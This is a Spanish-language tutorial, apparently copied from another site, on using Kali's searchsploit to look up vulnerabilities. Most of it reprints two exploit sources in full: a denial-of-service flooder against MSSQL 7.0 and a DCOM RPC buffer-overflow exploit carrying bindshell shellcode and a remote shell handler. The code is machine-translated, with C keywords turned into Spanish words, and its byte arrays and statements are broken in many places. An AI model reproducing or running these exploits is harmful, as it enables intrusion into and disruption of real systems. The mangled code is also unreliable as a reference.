Enseñar cómo usar kali para encontrar vulnerabilidades en sitios web

Searchsploit

Este artículo proviene de www.cnhackteam.org

Searchsploit utilizará el exploit-db local para encontrar información sobre vulnerabilidades del software

Abra la línea de comando de Kali, ingrese:

searchsploit

Ver ayuda del sistema

Buscar vulnerabilidades de mssql

Si desea encontrar vulnerabilidades de mssql , El comando es el siguiente, que encontrará toda la información de vulnerabilidad relacionada con mssql, seguida de información de descripción de vulnerabilidad relevante:

searchsploit mssql

Para ver la descripción de vulnerabilidad relevante, si lo desea para ver la vulnerabilidad remota de DOS mysql7.0, simplemente abra la ruta detrás de la descripción de la vulnerabilidad con un editor:

leafpad /usr/share/exploitdb/platforms/./windows/dos/562.c

El contenido del archivo de texto son archivos de descripción de vulnerabilidades y archivos de explotación de vulnerabilidades:

/* El servidor Microsoft mssql 7.0 es vulnerable a un ataque de denegación de servicio

* Al enviar un buffer grande con datos especificados un atacante puede detener

el servicio

* "mssqlserver" el error observado es diferente según el paquete de servicios

pero el resultado es siempre

*el mismo.

*Códigos de excepción = c0000005

*vulnerable: MSSQL7.0 sp0 - sp1 - sp2 - sp3

* Este código es para fines educativos, no soy responsable de tus actos

* Saludos:sm0g DEADm|x #crack.fr itmaroc y todos los que olvidé */ #include

#include

#pragma comment(lib,"ws2_32")

u_long resolv(char*);

void main(int argc, char **argv) {

WSADATA WinsockData;

SOCKET s; int i; struct sockaddr_in vulh; char buffer[700000]; =0; i<700000;i+=16)memcpy(búfer+i,"\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc ",16 ); if (argc!=3) {

printf(" Denegación de servicio MSSQL\n");

printf(" por securma massine\n");

printf("Salir

il a ete cree pour test ,je ne suis en aucun cas

responsable de los degats que vous pouvez en faire\n");

printf("Sintaxis: MSSQLdos < puerto>\n");

exit(1);

}

WSAStartup(0x101,&WinsockData);

s= socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

ZeroMemory(&vulh,sizeof(vulh));

vulh.sin_family=AF_INET;

vulh.sin_addr. s_addr=resolv(argv[1]);

vulh.sin_port=htons(atoi(argv[2])); if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh)) ==SOCKET_ERROR) {

printf("Imposible de conectar... el puerto está en general 1433...\n");

exit(1); p>

}

{

send(s,buffer,sizeof(buffer),0);

printf("Enviados de datos. .. \n");

}

printf("\nattendez quelques secondes et verifiez que le server ne

respuesta plus.\n");

closesocket(s);

WSACleanup();

}

u_long resolv(char *host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host_name)) == -1) { if (!(host_ent = gethostbyname(host_name))) {

printf ("Error DNS : Imposible resolver la dirección %s

!!!\n",host_name);

exit(1);

}

CopyMemory ((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length);

} return addr.s_addr;

} // milw0rm.com [2004-09 -29] ​​Ver código

Encontrar vulnerabilidades relacionadas con Windows XP

searchsploit /xp

Ver archivos de exploits:

leafpad /usr/share/exploitdb/platforms/./windows/remote/66.c

/*

?

Desbordamiento descubierto por LSD - Explotación basada en el código de Xfocus escrito por H D Moore - Uso: ./dcom

- Destinos:

? - ? 0 Windows 2000 SP0 (inglés)

? - ? 1 Windows 2000 SP1 (inglés)

? /p>

? - ? 3 Windows 2000 SP3 (inglés)

? - ? 4 Windows 2000 SP4 (inglés)

?

? - ? 6 Windows XP SP1 (inglés)

*/ #include #include #include #include < sys/types.h> #include #incluye #incluye #incluye #incluye #incluye < fcntl.h> #include unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x C0 , 0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, ,0 x10, 0x48,0x60,0x02,0x00,0x00,0x00}; solicitud de carácter sin firmar1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03, 0x00,0x00,0xE5,0x00, 0x00, 0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00, 0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24, 0x58, 0xFD, 0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x7

4,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C , 0x5E, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x80, 0x96, 0xF1, 0xF1, 0x2A, 0x4D, 0xCE, 0x11, 0xA6, 0x6A, 0x00, 0x20, 0xAF, 0x. 6E , 0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 0x 00, 0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x 00, 0x00, 0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00 , 0x00, 0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x0 0,0xCC ,0x CC, 0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02, 0x00,0x 00, 0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4 ,0x28 ,0xCD,0x 00, 0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00 , 0x00,0x00,0 x00, 0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0 x00 ,0x00,0x00,0x 00, 0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x0 0, 0x00,0x00,0x00,0 x00, 0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0 x00 ,0x00,

0x00, 0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0 x00 0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 , 0x00 , 0x00, 0x78,0X00, 0x00, 0x30,0X00, 0x00, 0x01,0X00, 0x00, 0x01,0x10, 0x08,0X00, 0xcc, 0xcc, 0x0, 0x00, 0x00, 0x00, 6,0x88,0x20,0xFF ,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00 , 0x00,0x00,0x00,0x00, 0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0 x00, 0x00,0x00,0x00,0x00 , 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x00, 0x00, 0x00, 00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,0x10, 0x08,0x00, 0xcc, 0xcc, 0xcc, 0x48,0X00, 0x07,0x66,0X00, 0x00, 0x66,0X00 0x06,0x09 00,0x00,0x00,0x00 ,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00, 0x00, 0x00,0x00,0x01,0x00,0x0 0,0x00 ,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0 x00 , 0x00,0x00,0x70,0xD8,0x98,0x9 3, 0x98,0x4f, 0xd2,0x11,0xa9,0x3d, 0xbe, 0x57,0xb2,0x00, 0x0000,0x00,0x32,0x0000,0x31,0x00,0x01,0x10,0x 08, 0x00,0xcc, 0xCC, 0xCCC, 0xccc, 0x80x0x 08, 0x00,0xcc, 0xCC, 0xCCC, 0xccc, 0xt ,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00, 0x00,0x00,0x00,0x00,0x18, 0x43 ,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0

x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x0 3 , 0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00 ,0 x01, 0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 x00, 0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08, 0x00, 0 xcc, 0xcc, 0xcc, 0xcc, 0x30,0x00, 0x00,0x00,0x78,0x00,0x6e, 0x00,0x00,0x0000,0x00,0x0000,0xd8,0xda, 0x0d, 0x00,0x00,0x00, 0x00,0x000000000000 ,0x00, 0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 3,0x00 ,0 x00, 0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00, 0x2E,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0 xCC, 0xCC,0x68, solicitud de carácter sin firmar 2 []={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00}; ={ 0x5C,0x00,0x43, 0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x 00, 0x31,0x00,0x31,0 x00, 0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,

0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; unsigned char *targets [] =

{ "Windows 2000 SP0 (inglés) )", "Windows 2000 SP1 (inglés)", "Windows 2000 SP2 (inglés)", "Windows 2000 SP3 (inglés)", "Windows 2000 SP4 (inglés)", "Windows XP SP0 (inglés)", "Windows " ed char sc []= "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x4E\x00\x42\x00 \x46\x00 \x58\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x46\x00\x58\x00" "\xff\xff\xff\xff" /* dirección del remitente * / "\xcc \xe0\xfd\x7f" /* bloque de datos del hilo primario */ "\xcc\xe0\xfd\x7f" /* bloque de datos del hilo primario */ /* puerto 4444 bindshell */ "\x90\x90\ x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\ x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\ x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\ x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\ x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\ x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90

\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff \xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92 \x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6 \x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd \xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c \x4c\x62\xcc\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf \x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7 \x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" " \xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84 \xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81 " "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96 \x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f \x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" "\x32\x0e\xb0\xb3\x7f\x01 \x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e \x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9 \x22\x1f\x4c\xd5\xcd\x

6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\ xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\ xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\ x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\ x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\ x80\x2f\xa2\x04"; solicitud de carácter sin firmar4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00, 0x00, 0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C, 0x0C,0x00,0x01,0x00,0x00,0x00,0x07, 0x00, 0x00,0x00,0x00,0x00,0x00,0x00 }; /* extraído del código TESO */ void shell (int sock) { int l; char buf[512];

fd_set? 1) {

FD_SET (0, &rfds);

FD_SET (calcetín, &rfds);

seleccione (calcetín + 1, &rfds, NULL, NULL, NULL); if (FD_ISSET (0, &rfds)) {

l = leer (0, buf, sizeof (buf)); if (l <= 0) { printf("\n - Conexión cerrada por usuario local\n"); salir (EXIT_FAILURE);

}

escribir (sock, buf, l);

} if (FD_ISSET (sock , &rfds)) {

l = leer (calcetín, buf,

sizeof (buf)); if (l == 0) { printf ("\n - Conexión cerrada por el host remoto.\n"); ) { printf ("\n - Error de lectura\n"); salir (EXIT_FAILURE);

}

escribir (1, buf, l);

}

}

} int main(int argc, char **argv) { int sock; int len,len1; unsigned int target_id; unsigned long struct sockaddr_in target_ip; puerto corto sin firmar = 135; char buf1 sin firmar [0x1000]; char buf2 sin firmar [0x1000]; ----------------------------------\n"); printf("- Explotación remota de desbordamiento del búfer DCOM RPC\ n"); printf("- Código original de FlashSky y Benjurry\n"); printf("- Reescrito por HDM \n"); if(argc<3)

{ printf("- Uso: %s \n", argv[0]); printf("- Destinos:\n"); ] != NULL ; len++)

{ printf("- ? %d\t%s\n", len, objetivos[len]);?

} printf(" \n") ; exit(1);

} /* sí, supéralo :) */ target_id = atoi(argv[1]);

ret = offsets[ target_id]; printf ("- Usando la dirección de retorno de 0x%.8x\n", ret memcpy(sc+36, (unsigned char *) &ret, 4);

target_ip.sin_family = AF_INET ;

target_ip.sin_addr.s_addr = inet_addr(argv[2]);

target_ip.sin_port = htons(puerto); if ((sock=socket(AF_INET,SOCK_STREAM,0 )) == -1)

{

perror("- Socket");

}

if(connect(sock,(struct sockaddr *)?_ip, sizeof(target_ip)) != 0)

{

perror("- Conectar"); ;

}

len=sizeof(sc); memcpy(buf2,request1,sizeof(request1));

len1=sizeof(request1);

*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;?

*(unsigned long *)(request2+ 8 )=*(unsigned long *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2));

len1=len1+sizeof(request2 )

len1=len1+tamañode(solicitud3); memcpy(buf2+len1,solicitud4,tamañode(solicitud4));

len1=len1+tamañode(solicitud4);

* ( unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x10)=* ( unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;?

*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+ sizeof (sc)-0xc;

*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0xb8 ) =*(largo sin firmar *)(buf2+0xb8)+sizeof(sc)-0xc;

*(largo sin firmar *)(buf2+0xd0)=*(largo sin firmar *)(buf2+0xd0 ) +sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; calcetín,bindstr,sizeof(bindstr),0)== -1)

{

perror("- Enviar");

;

}

len=recv(sock, buf1, 1000, 0); if (enviar(sock,buf2,len1,0)== -1)

{

perror("- Enviar"); return(0);

}

cerrar(calcetín);

dormir(1);

target_ip.sin_family = AF_INET;

target_ip.sin_addr.s_addr = inet_addr(argv[2]);

target_ip.sin_port = htons(4444); if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)

{

perror("- Socket"); 0);

} if(connect(sock,(struct sockaddr *)?_ip, sizeof(target_ip)) != 0)

{ printf("- El exploit parecía tener falló.\n"); return(0);

} printf("- Bajando al Shell del sistema...\n\n");

shell(sock); return(0);

} // milw0rm.com [2003-07-26] Ver código

Buscar vulnerabilidades de Apple

searchsploit apple